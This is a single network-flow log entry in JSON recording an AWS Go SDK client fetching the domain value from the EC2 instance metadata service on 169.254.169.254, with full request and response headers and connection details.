{"endtime":"2022-04-06T00:01:59.869330Z","timestamp":"2022-04-06T00:01:59.868959Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Tue, 05 Apr 2022 23:18:48 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 00:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"8941d435-b0df-42f6-bb14-39ebc98e06c3","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09VOF1BL7x0NyXaYZbON2WsM-Z1qkaWfGchcMfNC4DtPOA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":60256,"status":200,"time_taken":417,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"}